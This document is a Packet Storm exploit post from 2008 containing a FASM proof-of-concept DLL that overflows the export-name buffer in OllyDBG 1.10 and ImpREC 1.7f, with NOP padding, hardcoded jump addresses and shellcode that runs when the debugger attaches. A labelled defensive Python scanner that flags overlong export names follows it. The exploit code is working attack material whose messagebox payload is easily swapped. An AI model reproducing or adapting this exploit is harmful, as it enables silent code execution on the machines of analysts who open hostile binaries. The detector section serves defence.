ollydbg-overflow.txt

Published: 10 Jul 2008
Reported by: Defsanguje
Type: packetstorm
Source: packetstormsecurity.com

OllyDBG ImpREC export name buffer overflow vulnerability PoC for loading DLL and executing shellcode

Code
```asm
;-------------------------------------------------------------------------;
; OllyDBG v1.10 and ImpREC v1.7f export name buffer overflow vulnerability
; PoC (probably older versions affected too, not tested though.)
;
; Included shellcode shows a messagebox (WinXP SP2) and is configured for
; OllyDBG. See lines 60-105 for more details
;-------------------------------------------------------------------------;
; Usage:
; Load this DLL to your process and try to attach OllyDBG or ImpREC
; to it -> Shellcode executed >:)
;
; Shellcode gets fired also if program is run under OllyDBG.
;
; Bug discovered and PoC coded by:
; ~ Defsanguje, Defsanguje [at] gmail [dot] com [July 7 2008]
;-------------------------------------------------------------------------;
; Coded in FASM
;-------------------------------------------------------------------------;

format PE GUI 4.0 DLL

include 'win32a.inc'
entry DllEntryPoint

section '.code' code readable executable

proc DllEntryPoint, hinstDLL,fdwReason,lpvReserved
mov eax, TRUE
ret
endp

;-------------------------------------------------------------------------;
; Modified version from original export-macro.
;-------------------------------------------------------------------------;
macro ExportExploit dllname,[label]
{ common
local module,addresses,names,ordinal,count
count = 0
forward
count = count+1
common
dd 0,0,0,RVA module,1
dd count,count,RVA addresses,RVA names,RVA ordinal
addresses:
forward
dd RVA label
common
names:
forward
local name
dd RVA name
common
ordinal: count = 0
forward
dw count
count = count+1
common
module db dllname,0
forward

;-------------------------------------------------------------------------;
; Exploit for OllyDBG v1.10
;-------------------------------------------------------------------------;
a: name\
db 3e0h dup (90h)
dd 6d553b78h ; ESP to EBP
dd 6d55e5ffh ; EBP to EAX
dd 0defdefdeh
dd 0defdefdeh
dd 6d56d25eh ; add eax, 40h
dd 0defdefdeh
dd 6d52e1efh ; jmp EAX =)
db 40h-18h dup(90h)
c: push eax
mov eax, (ShellCodeStart-c) xor 0defdefdeh
xor eax, 0defdefdeh
add eax, [esp]
jmp eax
b: db 0bd0h - (ShellCodeEnd-ShellCodeStart) - (b-a) dup (90h)

ShellCodeStart:
db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
db 8Ah,05h,45h,7Eh ; Address of messagebox in winxp sp2
db 0FFh,0D3h
ShellCodeEnd:
dd 0045F823h ; New EIP

db 300h dup(90h)
db 0

;-------------------------------------------------------------------------;
; Exploit for ImpREC v1.7f
;-------------------------------------------------------------------------;
; name\
; db 0C0Ch - (ShellCodeEnd-ShellCodeStart) dup (90h)
;ShellCodeStart:
; db 81h,0ECh,07Dh,0FFh,0FFh,0FFh
; db 2Bh,0C9h,51h,51h,51h,51h,51h,0BBh
; db 8Ah,05h,45h,7Eh ; Address of messagebox in winxp sp2
; db 0FFh,0D3h
;ShellCodeEnd:
; dd 12c1b8h ; New EIP
; db 0
;-------------------------------------------------------------------------;

common
local x,y,z,str1,str2,v1,v2
x = count shr 1
while x > 0
y = x
while y < count
z = y
while z-x >= 0
load v1 dword from names+z*4
str1=($-RVA $)+v1
load v2 dword from names+(z-x)*4
str2=($-RVA $)+v2
while v1 > 0
load v1 from str1+%-1
load v2 from str2+%-1
if v1 <> v2
break
end if
end while
if v1<v2
load v1 dword from names+z*4
load v2 dword from names+(z-x)*4
store dword v1 at names+(z-x)*4
store dword v2 at names+z*4
load v1 word from ordinal+z*2
load v2 word from ordinal+(z-x)*2
store word v1 at ordinal+(z-x)*2
store word v2 at ordinal+z*2
else
break
end if
z = z-x
end while
y = y+1
end while
x = x shr 1
end while }

section '.edata' export data readable
;-------------------------------------------------------------------------;
; Call the macro
;-------------------------------------------------------------------------;
ExportExploit 'exploit.dll',\
$

;-------------------------------------------------------------------------;
```
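As an added, defender-side example (not part of the Packet Storm post or Defsanguje's PoC): a Python scanner that walks a PE32 export directory the way the FASM macro above lays it out (NumberOfNames at offset 24, AddressOfNames at offset 32) and flags any export name long enough to overrun a fixed-size name buffer, which is what a triage tool or a debugger plugin would check before attaching. The threshold EXPORT_NAME_LIMIT, the fixture builder build_pe and both sample images are constructed assumptions; the suspect sample carries a 0xC0C-byte name, the padding length the ImpREC variant above uses.

```python
import struct

EXPORT_NAME_LIMIT = 256  # assumed threshold: genuine export names are far shorter, the PoC's is ~3 KB

def rva_to_off(data, rva):  # map an RVA to a file offset through the section table
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    nsec, _, _, _, opt_size = struct.unpack_from("<HIIIH", data, pe + 6)
    sec = pe + 24 + opt_size
    for i in range(nsec):
        vsize, va, rsize, raw = struct.unpack_from("<IIII", data, sec + i * 40 + 8)
        if va <= rva < va + max(vsize, rsize):
            return raw + (rva - va)
    raise ValueError("RVA %#x lies outside every section" % rva)

def long_export_names(data, limit=EXPORT_NAME_LIMIT):
    """Return (length, first 16 chars) for every export name longer than limit (PE32 layout assumed)."""
    opt = struct.unpack_from("<I", data, 0x3C)[0] + 24          # optional header follows the COFF header
    exp_rva = struct.unpack_from("<I", data, opt + 96)[0]       # DataDirectory[0] = export table
    if exp_rva == 0:
        return []                                               # nothing exported, nothing to overflow
    exp = rva_to_off(data, exp_rva)
    n_names, _, names_rva = struct.unpack_from("<III", data, exp + 24)  # NumberOfNames, -, AddressOfNames
    names, hits = rva_to_off(data, names_rva), []
    for i in range(n_names):
        off = rva_to_off(data, struct.unpack_from("<I", data, names + 4 * i)[0])
        end = data.find(b"\0", off)
        length = (len(data) if end < 0 else end) - off          # unterminated name: count to end of file
        if length > limit:
            hits.append((length, data[off:off + 16].decode("latin-1")))
    return hits

def build_pe(names):
    """Constructed fixture: a minimal PE32 whose only section is an export directory naming `names`."""
    base, raw = 0x1000, 0x200
    blob = bytearray(40 + 4 * len(names))                       # IMAGE_EXPORT_DIRECTORY + AddressOfNames
    for i, n in enumerate(names):
        struct.pack_into("<I", blob, 40 + 4 * i, base + len(blob))
        blob += n.encode() + b"\0"
    struct.pack_into("<III", blob, 24, len(names), 0, base + 40)
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 60, 64)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224); struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<II", opt, 96, base, len(blob))
    sec = b".edata\0\0" + struct.pack("<IIII", len(blob), base, len(blob), raw) + bytes(16)
    hdr = dos + coff + opt + sec
    return bytes(hdr) + bytes(raw - len(hdr)) + bytes(blob)

# Constructed samples: a benign DLL, and one carrying a 0xC0C-byte export name as the ImpREC variant does.
BENIGN, SUSPECT = build_pe(["DllMain", "GetVersion"]), build_pe(["DllMain", "A" * 0xC0C])
```

Run long_export_names over a DLL's bytes before loading it into a debugger or import reconstructor; any hit is a name no legitimate toolchain emits.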
